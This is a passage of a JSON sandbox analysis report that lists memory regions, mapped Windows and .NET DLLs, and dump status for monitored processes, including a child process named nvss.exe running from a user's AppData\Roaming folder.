"\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_1178", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 41746432, "timestamp": "00:00:56.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 40960000, "type": "region", "version": 1 }, "end_va": 40992767, "entry_point": 40972334, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_1181", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 40960000, "timestamp": "00:00:57.194", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 41025536, "type": "region", "version": 1 }, "end_va": 41029631, "entry_point": 0, "filename": null, "id": "region_1182", "name": "pagefile_0x0000000002720000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41025536, "timestamp": "00:00:57.194", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 45613056, "type": "region", "version": 1 }, "end_va": 45887487, "entry_point": 45871164, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_1183", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 45613056, "timestamp": "00:00:57.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 1739194368, "type": "region", "version": 1 }, "end_va": 1739468799, "entry_point": 1739452476, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_1184", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 1739194368, "timestamp": "00:00:57.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 638976, "start_va": 1816002560, "type": "region", "version": 1 }, "end_va": 1816641535, "entry_point": 1816002560, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll", "id": "region_1185", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 1816002560, "timestamp": "00:00:57.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 544768, "start_va": 1816657920, "type": "region", "version": 1 }, "end_va": 1817202687, "entry_point": 1816657920, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\ee28a075665b6bc23b6dae56903d431d\\Microsoft.WSMan.Management.ni.dll", "id": "region_1186", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\ee28a075665b6bc23b6dae56903d431d\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1816657920, "timestamp": "00:00:57.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 1817247744, "type": "region", "version": 1 }, "end_va": 1817399295, "entry_point": 1817247744, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll", "id": "region_1187", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 1817247744, "timestamp": "00:00:57.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 307200, "start_va": 1817444352, "type": "region", "version": 1 }, "end_va": 1817751551, "entry_point": 1817444352, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4f68cd04686e5dc5a55070d112d44bdf\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_1188", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4f68cd04686e5dc5a55070d112d44bdf\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 1817444352, "timestamp": "00:00:57.198", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2314240, "start_va": 1817772032, "type": "region", "version": 1 }, "end_va": 1820086271, "entry_point": 1817772032, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll", "id": "region_1189", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 1817772032, "timestamp": "00:00:57.199", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\kFT6uTQW\\AppData\\Roaming\\nvss.exe\" ", "filename": "c:\\users\\kft6utqw\\appdata\\roaming\\nvss.exe", "id": "proc_7", "image_name": "nvss.exe", "monitor_reason": "child_process", "monitored_id": 7, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000007-region_00001215-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_327", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1215", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:58.038", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001216-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_328", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1216", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:58.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1217", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:58.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1218", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:58.041", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_1219", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:58.041", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001220-addr_0x00000000000b0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_329", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_1220", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:00:58.041", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001221-addr_0x00000000002b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_330", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 0, "filename": null, "id": "region_1221", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:00:58.042", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001222-addr_0x0000000001120000-size_0x000000000006a000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_331", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 434176, "start_va": 17956864, "type": "region", "version": 1 }, "end_va": 18391039, "entry_point": 17956864, "filename": "\\Users\\kFT6uTQW\\AppData\\Roaming\\nvss.exe", "id": "region_1222", "name": "nvss.exe", "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\nvss.exe", "region_type": "memory_mapped_file", "start_va": 17956864, "timestamp": "00:00:58.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1223", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:00:58.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1224", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:00:58.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1225", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:00:58.043", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001226-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_332", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1226", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:00:58.044", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001227-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_333", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1227", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:00:58.044", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001228-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_334", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1228", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:00:58.044", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1229", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:58.044", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001230-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_335", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1230", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:58.045", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1231", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:00:58.045", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001232-addr_0x00000000000f0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_336", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_1232", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:58.052", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1233", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:00:58.052", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1234", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:00:58.053", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1235", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:00:58.054", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001236-addr_0x00000000774a0000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_337", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_1236", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:00:58.055", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001237-addr_0x00000000775a0000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_338", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_1237", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:00:58.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1238", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:58.064", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001239-addr_0x0000000000170000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_339", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1239", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:58.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 4288511, "entry_point": 3866624, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1240", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 3866624, "timestamp": "00:00:58.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1948450816, "type": "region", "version": 1 }, "end_va": 1948753919, "entry_point": 1948462676, "filename": "\\Windows\\SysWOW64\\mscoree.dll", "id": "region_1241", "name": "mscoree.dll", "norm_filename": "c:\\windows\\syswow64\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1948450816, "timestamp": "00:00:58.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1242", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:00:58.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1243", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:00:58.066", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1244", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:58.066", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1245", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:58.067", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 4784127, "entry_point": 0, "filename": null, "id": "region_1246", "name": "private_0x0000000000480000", "norm_filename": null, "region_type": "private_memory", "start_va": 4718592, "timestamp": "00:00:58.110", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5242879, "entry_point": 0, "filename": null, "id": "region_1247", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:00:58.110", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 6029311, "entry_point": 0, "filename": null, "id": "region_1248", "name": "private_0x0000000000580000", "norm_filename": null, "region_type": "private_memory", "start_va": 5767168, "timestamp": "00:00:58.111", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1249", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:00:58.111", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1250", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:00:58.112", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1251", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:00:58.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1252", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:00:58.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1253", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:00:58.114", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1254", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:00:58.114", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 1947926528, "type": "region", "version": 1 }, "end_va": 1948426239, "entry_point": 1947934536, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_1255", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1947926528, "timestamp": "00:00:58.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 7340032, "type": "region", "version": 1 }, "end_va": 7602175, "entry_point": 0, "filename": null, "id": "region_1256", "name": "private_0x0000000000700000", "norm_filename": null, "region_type": "private_memory", "start_va": 7340032, "timestamp": "00:00:58.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], 